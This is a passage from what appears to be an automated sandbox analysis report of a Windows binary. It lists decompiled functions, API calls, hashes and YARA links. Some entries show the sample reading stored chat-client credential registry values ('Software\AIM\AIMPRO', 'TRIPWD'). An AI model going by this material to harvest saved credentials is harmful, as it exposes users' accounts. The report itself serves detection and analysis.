                                            • Part of subcall function 00406958: strlen.MSVCRT ref: 0040695D
                                            • Part of subcall function 00406958: memcpy.MSVCRT ref: 00406972
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Closememcpystrlen
                                          • String ID:
                                          • API String ID: 1317463181-0
                                          • Opcode ID: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                          • Instruction ID: 9f1eb3389bb6404362c4a1eb730a31a0c8d2a7d5337f5270765416232cb6ce98
                                          • Opcode Fuzzy Hash: 36fe1095114160a690701a78f195309e8067f9881caaff21558cd16a9a1fec4e
                                          • Instruction Fuzzy Hash: 74113DB2D0025CAEDB11DF98DC45BDEBBBCAB55304F0404EAA529B3241D7B45F888F65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040F9A0, Relevance: 1.6, APIs: 1, Instructions: 60timeCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 0040FA34: memset.MSVCRT ref: 0040FA77
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA8E
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FA97
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAF0
                                            • Part of subcall function 0040FA34: strlen.MSVCRT ref: 0040FAFE
                                            • Part of subcall function 00406D2B: GetFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040F9E7,00000000,?,00000000,?,?,00000000), ref: 00406D46
                                            • Part of subcall function 00406D2B: CloseHandle.KERNEL32(00000000,?,?,00000000), ref: 00406D4F
                                          • CompareFileTime.KERNEL32(?,?,00000000,?,?,00000000), ref: 0040F9F1
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: strlen$FileTime$CloseCompareHandlememset
                                          • String ID:
                                          • API String ID: 3621460190-0
                                          • Opcode ID: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                          • Instruction ID: df050e5846938951bd5ef1dd521a076978c5ac7e099cd3a6f0bbe67f44093ab2
                                          • Opcode Fuzzy Hash: f102af4ea2b32b0dd4e7b33198291439d6dd7ffc9cc7ac928c90ed2ef3e39010
                                          • Instruction Fuzzy Hash: 5C114FB2E00109ABDB15EFE9D9415EEBBB9AF44304F20407BE906F3281D6389E45CB65
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411D82, Relevance: 1.5, APIs: 1, Instructions: 20registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExA.KERNELBASE(?,?,00000000,?,?,?,00000008,00000008,?,0040275E,?,TRIPWD), ref: 00411D9B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                          • Instruction ID: a80749d54e4db297dbe5ce684396449be2bdfe43891eac82306683b5e99974c7
                                          • Opcode Fuzzy Hash: 37570f48f22fb23ef0d3df0d3c669cd07964a3a6542881bee3074b52f4b94034
                                          • Instruction Fuzzy Hash: 21E0B675504208FADB01CB90DC41EEE7BBCEB44644F1041AAB90596151E672AB449B64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411D37, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 00411D5E
                                            • Part of subcall function 00411C43: memset.MSVCRT ref: 00411C61
                                            • Part of subcall function 00411C43: _itoa.MSVCRT ref: 00411C78
                                            • Part of subcall function 00411C43: WritePrivateProfileStringA.KERNEL32(?,?,00000000), ref: 00411C87
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: PrivateProfile$StringWrite_itoamemset
                                          • String ID:
                                          • API String ID: 4165544737-0
                                          • Opcode ID: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                          • Instruction ID: 191c8e33efa92f5acf0b5800ded4dbdf6d41edfd47def5b2a3195e96d71d9d98
                                          • Opcode Fuzzy Hash: 64c123335bceee9c141adbd0577c67007e2c975ffdfd429c4cd850d6effa1a87
                                          • Instruction Fuzzy Hash: 28E0B632004609EBCF125F90EC05AE93F76FF44315F548459FA5C04530D33295B0AF84
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406ED6, Relevance: 1.5, APIs: 1, Instructions: 17fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406ED6(void* __ecx, intOrPtr* __esi, void* _a4, void* _a8, long _a12) {
				long _v8;
				int _t9;

				_v8 = _v8 & 0x00000000;
				_t9 = ReadFile(_a4, _a8, _a12,  &_v8, 0); // executed
				if(__esi != 0) {
					 *((intOrPtr*)(__esi)) = _v8;
					return _t9;
				}
				return _t9;
			}





                                          0x00406eda
                                          0x00406eed
                                          0x00406ef5
                                          0x00406efa
                                          0x00000000
                                          0x00406efa
                                          0x00406efd

                                          APIs
                                          • ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileRead
                                          • String ID:
                                          • API String ID: 2738559852-0
                                          • Opcode ID: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                          • Instruction ID: aa4cf13b5f890a7c287dc17e2503e7ef9553656c8147c817b9e920ceb3cbd6db
                                          • Opcode Fuzzy Hash: a90c0f663160ddd1806211c67689bb6444212dacbbb8cc2b1f9417cee627f633
                                          • Instruction Fuzzy Hash: 21E0173691020CFBDF12CF80CC05FEEBBB9EB04B04F204068B901A62A0C7759E10EB98
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407A7A, Relevance: 1.5, APIs: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ??3@
                                          • String ID:
                                          • API String ID: 613200358-0
                                          • Opcode ID: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                          • Instruction ID: d064f037d8cc498e3967daff6ff593c2326981cc2c3d102c7782d5cd9755b432
                                          • Opcode Fuzzy Hash: 9730bdd872ffcfc6838ff9b84d0f6ef43d311b98765be4a3d863fce2df9ab07c
                                          • Instruction Fuzzy Hash: A5C00272A14B018FE7709E55D4057A6B3E4AF1073BF618C1DD4D591581D77CE5848E14
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004067D3, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004067D3(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x40000000, 1, 0, 2, 0, 0); // executed
				return _t3;
			}




                                          0x004067e5
                                          0x004067eb

                                          APIs
                                          • CreateFileA.KERNELBASE(00000000,40000000,00000001,00000000,00000002,00000000,00000000,0040A792,00000000), ref: 004067E5
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                          • Instruction ID: 92edde76bd8748fbe9720986c638c7b7c767b624a816766c44db5ce3c9f9c76e
                                          • Opcode Fuzzy Hash: 96ee2d3e2a5f08fb7e0664ffc2d87f5ef5a690df2876f5604083955e74d05a1c
                                          • Instruction Fuzzy Hash: 18C012F0790300BEFF214B10AE0EFB7355DD7C0700F1084207E40E80E0C2E14C008524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004067BA, Relevance: 1.5, APIs: 1, Instructions: 10fileCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004067BA(CHAR* _a4) {
				void* _t3;

				_t3 = CreateFileA(_a4, 0x80000000, 1, 0, 3, 0, 0); // executed
				return _t3;
			}




                                          0x004067cc
                                          0x004067d2

                                          APIs
                                          • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CreateFile
                                          • String ID:
                                          • API String ID: 823142352-0
                                          • Opcode ID: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                          • Instruction ID: 6b5441a44151c9e47baf98361d0eca158f6ada1b16bcce3b9b94d573676807d0
                                          • Opcode Fuzzy Hash: d56762f5ff07e452d55025f92145a06934d9f9e83bc165fc514a96713f281235
                                          • Instruction Fuzzy Hash: 63C092B0690200BEFE224A10AE19FB6255DD780700F2044247E40E80E0C1A14D108524
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00404CE0, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00404CE0(signed int* __esi) {
				struct HINSTANCE__* _t3;
				int _t4;

				_t3 =  *__esi;
				__esi[1] = __esi[1] & 0x00000000;
				if(_t3 != 0) {
					_t4 = FreeLibrary(_t3); // executed
					 *__esi =  *__esi & 0x00000000;
					return _t4;
				}
				return _t3;
			}





                                          0x00404ce0
                                          0x00404ce2
                                          0x00404ce8
                                          0x00404ceb
                                          0x00404cf1
                                          0x00000000
                                          0x00404cf1
                                          0x00404cf4

                                          APIs
                                          • FreeLibrary.KERNELBASE(?,00404CA5,00000000,00404771,?,?), ref: 00404CEB
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FreeLibrary
                                          • String ID:
                                          • API String ID: 3664257935-0
                                          • Opcode ID: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                          • Instruction ID: e399220ee4d6b13c72a3c0d8b1802730825471fdce5c5047c746ffbeb5b4c0d0
                                          • Opcode Fuzzy Hash: 09654d27d92bbbd4347e31d37517ef01c67619c045b00d8d4426f03fbba466b4
                                          • Instruction Fuzzy Hash: 95C09B71111701CBF7214F50C948793B7F4BF40717F50485C95D5D5080D77CD554DA18
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412111, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          APIs
                                          • EnumResourceNamesA.KERNEL32(?,?,Function_0001208B,00000000), ref: 00412120
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: EnumNamesResource
                                          • String ID:
                                          • API String ID: 3334572018-0
                                          • Opcode ID: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                          • Instruction ID: 035a6a4498e4538559194e0194001357af3b3daa9477d160ae033d236808df75
                                          • Opcode Fuzzy Hash: ba829d88c3412ff21df67adf2b83c510d22bc263701ca9dedf1e72494c089302
                                          • Instruction Fuzzy Hash: F1C09B31594741D7D7119F608D05F5B7E95BB9C701F114D397355D40A4D7514024D605
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00407930, Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00407930(signed int* __esi) {
				int _t2;
				void* _t3;

				_t3 =  *__esi;
				if(_t3 != 0xffffffff) {
					_t2 = FindClose(_t3); // executed
					 *__esi =  *__esi | 0xffffffff;
					return _t2;
				}
				return 0;
			}





                                          0x00407930
                                          0x00407937
                                          0x0040793a
                                          0x00407940
                                          0x00000000
                                          0x00407940
                                          0x00407943

                                          APIs
                                          • FindClose.KERNELBASE(?,00407846,00000000,?,?,?,004042E3,?), ref: 0040793A
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: CloseFind
                                          • String ID:
                                          • API String ID: 1863332320-0
                                          • Opcode ID: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                          • Instruction ID: 0badf10416d1e61bd1c3ad237588f2502b9813823e024cd162efce7da5e32b0f
                                          • Opcode Fuzzy Hash: 7e54cd433b5ce253bc2727deb76d35bdd44679d6989c35a24742b702d722518c
                                          • Instruction Fuzzy Hash: B5C09270A109019BE22C5F38EC5986E77E1AF8A3343B45F6CA0F3E20F0E73895428A04
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00411D68, Relevance: 1.5, APIs: 1, Instructions: 7registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                          • Instruction ID: ce7f413466e1863fe1078dd7deec7b9c9a94e59086d3684c19d06f0563d6b072
                                          • Opcode Fuzzy Hash: b465aea9c7eaf0091ba49f462bc8b3cd6046f75692c30915c3b30d88ca534391
                                          • Instruction Fuzzy Hash: 5CC09235548301FFDE128F80EE0AF4ABFA2BBC8B05F508818B284240B1C2728824EB57
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004069D3, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E004069D3(CHAR* _a4) {
				long _t4;

				_t4 = GetFileAttributesA(_a4); // executed
				return 0 | _t4 != 0xffffffff;
			}




                                          0x004069d7
                                          0x004069e7

                                          APIs
                                          • GetFileAttributesA.KERNELBASE(0040390F,0040D4DB,0040390F,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004069D7
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: AttributesFile
                                          • String ID:
                                          • API String ID: 3188754299-0
                                          • Opcode ID: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                          • Instruction ID: 66443cf59350c8d7b1baefe17900325ca04844ca679cc43594c3e66389cfa9db
                                          • Opcode Fuzzy Hash: 77a73d6f288b94d7a7248812d8204c1d44c35e38f391bb5ddf3e052da3bda440
                                          • Instruction Fuzzy Hash: 48B012752104009BCB090B34DD451CD35505F84631720473CB033C40F0E720CC60BA00
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Non-executed Functions

                                          Function 0040BA30, Relevance: 9.1, APIs: 6, Instructions: 54fileclipboardCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E0040BA30(void* __eax, void* __ebx) {
				char _v264;
				char _v524;
				void* __edi;
				void* __esi;
				long _t13;
				void* _t18;
				int _t19;
				long _t20;
				void* _t27;
				void* _t31;

				_t27 = __ebx;
				_t31 = __eax;
				_t13 = GetTempPathA(0x104,  &_v524);
				_t32 = _t13;
				if(_t13 == 0) {
					GetWindowsDirectoryA( &_v524, 0x104);
				}
				_v264 = 0;
				GetTempFileNameA( &_v524, 0x418628, 0,  &_v264);
				_t18 = E0040B9EA(_t31, _t32,  &_v264, 2, 1);
				if(_t18 != 0) {
					_t19 = OpenClipboard( *(_t31 + 0x108));
					_t34 = _t19;
					if(_t19 == 0) {
						_t20 = GetLastError();
					} else {
						_t20 = E004068B5(_t27, 0x104, _t31, _t34,  &_v264);
					}
					if(_t20 != 0) {
						E00406830(_t20,  *(_t31 + 0x108));
					}
					return DeleteFileA( &_v264);
				}
				return _t18;
			}













                                          0x0040ba30
                                          0x0040ba3b
                                          0x0040ba4a
                                          0x0040ba50
                                          0x0040ba52
                                          0x0040ba5c
                                          0x0040ba5c
                                          0x0040ba77
                                          0x0040ba7e
                                          0x0040ba8f
                                          0x0040ba96
                                          0x0040ba9e
                                          0x0040baa4
                                          0x0040baa6
                                          0x0040bab7
                                          0x0040baa8
                                          0x0040baaf
                                          0x0040bab4
                                          0x0040babf
                                          0x0040bac7
                                          0x0040bacc
                                          0x00000000
                                          0x0040bad4
                                          0x0040badd

                                          APIs
                                          • GetTempPathA.KERNEL32(00000104,?), ref: 0040BA4A
                                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 0040BA5C
                                          • GetTempFileNameA.KERNEL32(?,00418628,00000000,?), ref: 0040BA7E
                                          • OpenClipboard.USER32(?), ref: 0040BA9E
                                          • GetLastError.KERNEL32 ref: 0040BAB7
                                          • DeleteFileA.KERNEL32(00000000), ref: 0040BAD4
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: FileTemp$ClipboardDeleteDirectoryErrorLastNameOpenPathWindows
                                          • String ID:
                                          • API String ID: 2014771361-0
                                          • Opcode ID: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                          • Instruction ID: 5bfde055311aa1c1ac8a047c999dbef42aa9d8293b3a95092e24ac928ebec7a0
                                          • Opcode Fuzzy Hash: bc4e754206438fbec1c043f7d2b58fad48fd6537ef89688e957de5baac6cac8f
                                          • Instruction Fuzzy Hash: E9115276600218ABDB609BA1DC49FCB77BCAB54701F0040B6B69AE2091DBB499C58F68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00406B06, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E00406B06() {

				if( *0x41e164 == 0) {
					0x41e160->dwOSVersionInfoSize = 0x94;
					GetVersionExA(0x41e160);
				}
				return 0x41e160;
			}



                                          0x00406b13
                                          0x00406b16
                                          0x00406b20
                                          0x00406b20
                                          0x00406b29

                                          APIs
                                          • GetVersionExA.KERNEL32(0041E160,?,00406B2F,0040261A), ref: 00406B20
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Version
                                          • String ID: `A
                                          • API String ID: 1889659487-1337903584
                                          • Opcode ID: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                          • Instruction ID: da77bcce2c8e52e385cf56c8afe7a40ad3a24cfb33d571a5ca18312b8fc7eb0c
                                          • Opcode Fuzzy Hash: 89848a9a064684b9105e07163e2dbe6bd78a8fd97e7dba8b0dce623eab9b2175
                                          • Instruction Fuzzy Hash: 8EC00279911225EBD6205B59BD08BC677A8A74D355F018476A901A2264C3F81C45C799
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00412768, Relevance: 191.1, APIs: 8, Strings: 101, Instructions: 307stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • strlen.MSVCRT ref: 00412B87
                                          • _strncoll.MSVCRT ref: 00412B97
                                          • memcpy.MSVCRT ref: 00412C13
                                          • atoi.MSVCRT ref: 00412C24
                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000002,00000000,00000000,?,?,?,?,?,?,?,?), ref: 00412C50
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: ByteCharMultiWide_strncollatoimemcpystrlen
                                          • String ID: AElig;$Aacute;$Acirc;$Agrave;$Aring;$Atilde;$Auml;$Ccedil;$ETH;$Eacute;$Ecirc;$Egrave;$Euml;$Iacute;$Icirc;$Igrave;$Iuml;$Ntilde;$Oacute;$Ocirc;$Ograve;$Oslash;$Otilde;$Ouml;$THORN;$Uacute;$Ucirc;$Ugrave;$Uuml;$Yacute;$aacute;$acirc;$acute;$aelig;$agrave;$amp;$apos;$aring;$atilde;$auml;$brvbar;$ccedil;$cedil;$cent;$copy;$curren;$deg;$divide;$eacute;$ecirc;$egrave;$eth;$euml;$frac12;$frac14;$frac34;$gt;$iacute;$icirc;$iexcl;$igrave;$iquest;$iuml;$laquo;$lt;$macr;$micro;$middot;$nbsp;$not;$ntilde;$oacute;$ocirc;$ograve;$ordf;$ordm;$oslash;$otilde;$ouml;$para;$plusmn;$pound;$quot;$raquo;$reg;$sect;$shy;$sup1;$sup2;$sup3;$szlig;$thorn;$times;$uacute;$ucirc;$ugrave;$uml;$uuml;$yacute;$yen;$yuml;
                                          • API String ID: 1864335961-3210201812
                                          • Opcode ID: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                          • Instruction ID: 3bd07b0f0ec87f02ccef6cae80a33f2a43e47736a5c113f17b6628cc3434821e
                                          • Opcode Fuzzy Hash: 4454015bb34ad17b627a5be0e2725abbe23317b8734bfa8cf262dd92011da116
                                          • Instruction Fuzzy Hash: 3BF125B1C042989EDF25CF94C9687DDBBB1AB05308F1481CAD8596B242D7B84ECACF5C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004117B1, Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 264stringCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 004117DE
                                          • GetDlgItem.USER32(?,000003E8), ref: 004117EA
                                          • GetWindowLongA.USER32(00000000,000000F0), ref: 004117F9
                                          • GetWindowLongA.USER32(?,000000F0), ref: 00411805
                                          • GetWindowLongA.USER32(00000000,000000EC), ref: 0041180E
                                          • GetWindowLongA.USER32(?,000000EC), ref: 0041181A
                                          • GetWindowRect.USER32(00000000,?), ref: 0041182C
                                          • GetWindowRect.USER32(?,?), ref: 00411837
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 0041184B
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411859
                                          • GetDC.USER32 ref: 00411892
                                          • strlen.MSVCRT ref: 004118D2
                                          • GetTextExtentPoint32A.GDI32(?,00000000,00000000,?), ref: 004118E3
                                          • ReleaseDC.USER32(?,?), ref: 00411930
                                          • sprintf.MSVCRT ref: 004119F0
                                          • SetWindowTextA.USER32(?,?), ref: 00411A04
                                          • SetWindowTextA.USER32(?,00000000), ref: 00411A22
                                          • GetDlgItem.USER32(?,00000001), ref: 00411A58
                                          • GetWindowRect.USER32(00000000,?), ref: 00411A68
                                          • MapWindowPoints.USER32(00000000,?,?,00000002), ref: 00411A76
                                          • GetClientRect.USER32(?,?), ref: 00411A8D
                                          • GetWindowRect.USER32(?,?), ref: 00411A97
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000206), ref: 00411ADD
                                          • GetClientRect.USER32(?,?), ref: 00411AE7
                                          • SetWindowPos.USER32(?,00000000,?,?,?,?,00000204), ref: 00411B1F
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: Window$Rect$Long$ItemPointsText$Client$ExtentPoint32Releasesprintfstrlen
                                          • String ID: %s:$EDIT$STATIC
                                          • API String ID: 1703216249-3046471546
                                          • Opcode ID: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                          • Instruction ID: b52727e0d403183305b875c614282f55299ec8bf2f46e0c3c56b37a88aeefe3f
                                          • Opcode Fuzzy Hash: aed0d2fc460153e712b5f87657be857b759c42e44ee73449b635be24a1b57749
                                          • Instruction Fuzzy Hash: B2B1DF72108341AFD711DF68C985AABBBE9FF88704F00492DFA9993261DB75E904CF16
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 004105A6, Relevance: 42.2, APIs: 22, Strings: 2, Instructions: 213windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • EndDialog.USER32(?,?), ref: 004105EE
                                          • GetDlgItem.USER32(?,000003EA), ref: 00410606
                                          • SendMessageA.USER32(00000000,000000B1,00000000,0000FFFF), ref: 00410625
                                          • SendMessageA.USER32(?,00000301,00000000,00000000), ref: 00410632
                                          • SendMessageA.USER32(?,000000B1,00000000,00000000), ref: 0041063B
                                          • memset.MSVCRT ref: 00410663
                                          • memset.MSVCRT ref: 00410683
                                          • memset.MSVCRT ref: 004106A1
                                          • memset.MSVCRT ref: 004106BA
                                          • memset.MSVCRT ref: 004106D8
                                          • memset.MSVCRT ref: 004106F1
                                          • GetCurrentProcess.KERNEL32 ref: 004106F9
                                          • ReadProcessMemory.KERNEL32(00000000,?,00000080,00000000), ref: 0041071E
                                          • ReadProcessMemory.KERNEL32(?,?,00000080,00000000), ref: 00410754
                                          • memset.MSVCRT ref: 0041078F
                                          • GetCurrentProcessId.KERNEL32 ref: 0041079D
                                          • memcpy.MSVCRT ref: 004107CC
                                          • _mbscpy.MSVCRT ref: 004107EE
                                          • sprintf.MSVCRT ref: 00410859
                                          • SetDlgItemTextA.USER32(?,000003EA,?), ref: 00410872
                                          • GetDlgItem.USER32(?,000003EA), ref: 0041087C
                                          • SetFocus.USER32(00000000), ref: 00410883
                                          Strings
                                          • {Unknown}, xrefs: 00410668
                                          • Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s, xrefs: 00410853
                                          Memory Dump Source
                                          • Source File: 00000013.00000002.756879879.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                          Similarity
                                          • API ID: memset$Process$ItemMessageSend$CurrentMemoryRead$DialogFocusText_mbscpymemcpysprintf
                                          • String ID: Exception %8.8X at address %8.8X in module %sRegisters: EAX=%8.8X EBX=%8.8X ECX=%8.8X EDX=%8.8XESI=%8.8X EDI=%8.8X EBP=%8.8X ESP=%8.8XEIP=%8.8XStack Data: %sCode Data: %s${Unknown}
                                          • API String ID: 1428123949-3474136107
                                          • Opcode ID: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                          • Instruction ID: 62e2ad0b84330276400548424eb425e056568d51af16bfff45d60a010caf4195
                                          • Opcode Fuzzy Hash: dfc1cacd1db7b3e5e31f88e82e27deeb72c9f49ab4d69ff4c670fff32b5d8099
                                          • Instruction Fuzzy Hash: 1D7108B2804248FFD721DF51EC45EDB7BACEF48344F04443EF54892160EA759A94CBA9
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0040B4F6, Relevance: 37.0, APIs: 14, Strings: 7, Instructions: 286windowregistrystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 65%
                                          			E0040B4F6(void* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				struct HMENU__* _t115;
				struct HWND__* _t117;
				void* _t119;
				intOrPtr _t123;
				void* _t128;
				void* _t129;
				intOrPtr _t131;
				void* _t164;
				void* _t165;
				int _t170;
				void* _t171;
				void* _t172;
				void* _t176;
				void* _t185;
				void* _t195;
				void* _t196;
				intOrPtr _t198;
				intOrPtr _t199;
				void* _t200;
				intOrPtr* _t201;
				int _t203;
				intOrPtr* _t208;
				int* _t209;
				void* _t211;
				intOrPtr* _t212;
				void* _t214;

				_t214 = __eflags;
				_t209 = _t211 - 0x78;
				_t212 = _t211 - 0xa0;
				_t165 = __ecx;
				 *(_t209 - 0x28) =  *(_t209 - 0x28) & 0x00000000;
				 *(_t209 - 0x24) =  *(_t209 - 0x24) & 0x00000000;
				 *((char*)(_t209 - 0x20)) = 0;
				 *((char*)(_t209 - 0x1f)) = 1;
				 *((char*)(_t209 - 0x1e)) = 0;
				 *((char*)(_t209 - 0x1d)) = 0;
				asm("stosd");
				asm("stosd");
				 *((intOrPtr*)(_t209 - 0x14)) = 6;
				 *((intOrPtr*)(_t209 - 0x10)) = 0x9c56;
				 *((char*)(_t209 - 0xc)) = 4;
				 *((char*)(_t209 - 0xb)) = 0;
				 *((char*)(_t209 - 0xa)) = 0;
				 *((char*)(_t209 - 9)) = 0;
				asm("stosd");
				asm("stosd");
				 *_t209 = 1;
				_t209[1] = 0x9c41;
				_t209[2] = 4;
				_t209[2] = 0;
				_t209[2] = 0;
				_t209[2] = 0;
				asm("stosd");
				asm("stosd");
				_t209[5] = 5;
				_t209[6] = 0x9c44;
				_t209[7] = 4;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[7] = 0;
				_t209[0x1b] = _t209[0x1b] | 0xffffffff;
				asm("stosd");
				asm("stosd");
				_t209[0xa] = 2;
				_t209[0xb] = 0x9c48;
				_t209[0xc] = 4;
